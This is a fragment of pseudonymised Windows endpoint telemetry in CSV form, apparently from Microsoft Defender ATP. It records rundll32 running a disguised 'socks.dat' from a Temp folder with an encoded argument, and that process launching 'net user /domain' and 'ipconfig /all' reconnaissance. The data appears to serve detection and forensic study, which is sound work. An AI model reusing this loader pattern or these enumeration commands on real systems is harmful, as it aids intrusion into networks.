+847,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:43.772747700+00:00,6872,dllhost.exe,DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},True,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:16:44.946040800+00:00,2021-06-23 03:18:54.663413400+00:00,84535d2a-ea5a-4652-8939-85aeef097b9e,computerpii_0a470890c60768167990033d701e7bd881398861,161273,False,10.7740.19041.1052,False,11540474045173045,,11540474045173046,2021-06-23 03:16:43.772747700+00:00,6872,2021-06-23 03:16:43.772747700+00:00,\Device\HarddiskVolume3\Windows\System32\dllhost.exe,6872,128,ActiveProcessStartkey,C:\Windows\System32,21312,2098-11-02 01:44:16+00:00,2020-10-09 20:47:24.152425900+00:00,2021-06-22 03:28:49.693286+00:00,2020-10-09 20:47:24.152425900+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,128.0,5.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+848,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:16:47.685259+00:00,13212,cmd.exe,"""cmd.exe"" /c ""net user /domain""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:14:29.844176700+00:00,13028,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",False,2021-06-23 03:12:10.599816700+00:00,18532,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:16:48.040134600+00:00,2021-06-23 03:18:54.663449400+00:00,69070d29-e41d-48af-ace0-28efc5dc474b,computerpii_0a470890c60768167990033d701e7bd881398861,161277,False,10.7740.19041.1052,False,11540474045173018,,11540474045173047,2021-06-23 03:14:29.844176700+00:00,13028,2021-06-23 03:14:29.844176700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,13028,18560,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+849,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:16:47.764887600+00:00,16336,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:47.685259+00:00,13212,cmd.exe,"""cmd.exe"" /c ""net user /domain""",False,2021-06-23 03:14:29.844176700+00:00,13028,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:16:48.040458400+00:00,2021-06-23 03:18:54.663484600+00:00,972ca072-896b-4e22-8e49-d53c12feef24,computerpii_0a470890c60768167990033d701e7bd881398861,161278,False,10.7740.19041.1052,False,11540474045173047,,11540474045173048,2021-06-23 03:16:47.685259+00:00,13212,2021-06-23 03:16:47.685259+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,13212,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+850,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:16:47.802167700+00:00,16784,net.exe,net  user /domain,PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\net.exe,59904,0bd94a338eea5a4e1f2830ae326e6d19,9f376759bcbcd705f726460fc4a7e2b07f310f52baa73caaaaa124fddbdf993e,88b101598cc6726b7a57d02b1fa95be1b272a821,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:47.685259+00:00,13212,cmd.exe,"""cmd.exe"" /c ""net user /domain""",False,2021-06-23 03:14:29.844176700+00:00,13028,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:16:48.042027300+00:00,2021-06-23 03:18:54.663519200+00:00,fe80ff1a-3ed9-4e03-8e7f-d5dc7e5e6836,computerpii_0a470890c60768167990033d701e7bd881398861,161279,False,10.7740.19041.1052,False,11540474045173047,,11540474045173049,2021-06-23 03:16:47.685259+00:00,13212,2021-06-23 03:16:47.685259+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,13212,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,net.exe,net.exe,Net Command
+851,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:16:47.811118800+00:00,20444,net1.exe,net1  user /domain,PortableExecutable,2021-03-11 01:07:22.990816900+00:00,C:\Windows\System32\net1.exe,183808,ba0bccc6029fbbe6d8b41197f252742f,253e6148ec7a95ea3950e032f9def1ec7c0e0cd172cc6d770d2807a64fc4a7ca,fa29205a40d3cbc69946784946c75eb66afd9950,0bd94a338eea5a4e1f2830ae326e6d19,9f376759bcbcd705f726460fc4a7e2b07f310f52baa73caaaaa124fddbdf993e,88b101598cc6726b7a57d02b1fa95be1b272a821,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:47.802167700+00:00,16784,net.exe,net  user /domain,False,2021-06-23 03:16:47.685259+00:00,13212,\Device\HarddiskVolume3\Windows\System32\cmd.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:16:48.042961300+00:00,2021-06-23 03:18:54.663553300+00:00,57d0c5a4-f178-42f0-9f4b-7b17f9a5073f,computerpii_0a470890c60768167990033d701e7bd881398861,161280,False,10.7740.19041.1052,False,11540474045173049,,11540474045173050,2021-06-23 03:16:47.802167700+00:00,16784,2021-06-23 03:16:47.802167700+00:00,\Device\HarddiskVolume3\Windows\System32\net.exe,16784,18560,TerminateProcessStartkey,C:\Windows\System32,59904,1986-05-05 23:55:09+00:00,2019-12-07 09:09:33.990210300+00:00,2021-06-23 03:15:31.436697300+00:00,2019-12-07 09:09:33.990210300+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,net.exe,net.exe,Net Command,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,net1.exe,net1.exe,Net Command
+852,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:17:12.840131100+00:00,16696,cmd.exe,"""cmd.exe"" /c ""ipconfig /all""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:14:29.844176700+00:00,13028,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",False,2021-06-23 03:12:10.599816700+00:00,18532,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:17:13.374630500+00:00,2021-06-23 03:18:54.663654200+00:00,8d6a52b6-ba87-462e-8a75-19667eabea2a,computerpii_0a470890c60768167990033d701e7bd881398861,161288,False,10.7740.19041.1052,False,11540474045173018,,11540474045173053,2021-06-23 03:14:29.844176700+00:00,13028,2021-06-23 03:14:29.844176700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,13028,18560,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+853,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:17:12.857429600+00:00,4296,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:17:12.840131100+00:00,16696,cmd.exe,"""cmd.exe"" /c ""ipconfig /all""",False,2021-06-23 03:14:29.844176700+00:00,13028,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:17:13.375507400+00:00,2021-06-23 03:18:54.663688+00:00,3aa19115-7820-4924-8bda-182b27a39cea,computerpii_0a470890c60768167990033d701e7bd881398861,161289,False,10.7740.19041.1052,False,11540474045173053,,11540474045173054,2021-06-23 03:17:12.840131100+00:00,16696,2021-06-23 03:17:12.840131100+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,16696,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+854,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:17:12.901805100+00:00,7520,ipconfig.exe,ipconfig  /all,PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\ipconfig.exe,35840,62f170fb07fdbb79ceb7147101406eb8,53e000f5aa9b3a00934319db8080bb99cb323bf48fc628a64f75d7847c265606,d9bbb4e4900ff03b0486fac32768170249dad82d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:17:12.840131100+00:00,16696,cmd.exe,"""cmd.exe"" /c ""ipconfig /all""",False,2021-06-23 03:14:29.844176700+00:00,13028,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:17:13.379328900+00:00,2021-06-23 03:18:54.663723600+00:00,d6253c20-1fad-4792-ada4-4d308b1ff35c,computerpii_0a470890c60768167990033d701e7bd881398861,161290,False,10.7740.19041.1052,False,11540474045173053,,11540474045173055,2021-06-23 03:17:12.840131100+00:00,16696,2021-06-23 03:17:12.840131100+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,16696,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,ipconfig.exe,ipconfig.exe,IP Configuration Utility
+855,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:05:52.627188500+00:00,21276,SenseCncProxy.exe,4280,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:05:52.676709400+00:00,2021-06-25 01:06:12.881550+00:00,f9392650-5736-46b9-99ae-fb0e91b9c5de,computerpii_0a470890c60768167990033d701e7bd881398861,182617,False,10.7740.19041.1052,False,11540474045137006,,11540474045178622,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,16512,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+856,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 05:38:21.523653100+00:00,5476,LogonUI.exe,"""LogonUI.exe"" /flags:0x0 /state0:0xaca5a055 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.425662+00:00,13120,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-22 11:17:36.333146300+00:00,19212,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 05:38:21.729839300+00:00,2021-06-23 06:20:53.286900900+00:00,b9a0ce3b-3da3-4740-b31d-4a369f51faee,computerpii_0a470890c60768167990033d701e7bd881398861,163606,False,10.7740.19041.1052,False,11540474045171720,,11540474045173746,2021-06-22 11:17:36.425662+00:00,13120,2021-06-22 11:17:36.425662+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,13120,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-22 11:17:36.426909300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+857,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:30:09.131650800+00:00,10884,iexplore.exe,"""IEXPLORE.EXE"" SCODEF:10048 CREDAT:9474 /prefetch:2",PortableExecutable,2019-12-07 09:51:10.439373900+00:00,C:\Program Files (x86)\Internet Explorer\iexplore.exe,816072,2e414291458b49acda42c80a4c10de7e,e582676ec900249b408ab4e37976ae8c443635a7da77755daf6f896a172856a3,6bd522a0f1b3f5c11e8e33c5062c45dd6e402113,6bfe7ca23c89fd5809a48355ec5625ee,f76f00939f1be76152809c37591ef75d3c150745232e35697d99cae09e31c2bc,9ed866e14bb54406c075929183524039ab851a25,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:30:08.926147100+00:00,10048,iexplore.exe,"""iexplore.exe"" -startmanager -Embedding",False,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:30:09.149130200+00:00,2021-06-23 01:31:38.228680200+00:00,1a2746fa-e157-4d4a-9b51-8f56029cb9f4,computerpii_0a470890c60768167990033d701e7bd881398861,158637,False,10.7740.19041.1052,False,11540474045172466,,11540474045172467,2021-06-23 01:30:08.926147100+00:00,10048,2021-06-23 01:30:08.926147100+00:00,\Device\HarddiskVolume3\Program Files\Internet Explorer\iexplore.exe,10048,128,ActiveProcessStartkey,C:\Program Files\Internet Explorer,819136,2040-12-07 02:05:59+00:00,2019-12-06 21:47:00+00:00,2021-06-23 01:30:08.973063300+00:00,2019-12-07 09:51:10.439373900+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,20608.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Internet Explorer,11.00.19041.1,iexplore,IEXPLORE.EXE,Internet Explorer,Microsoft Corporation,Internet 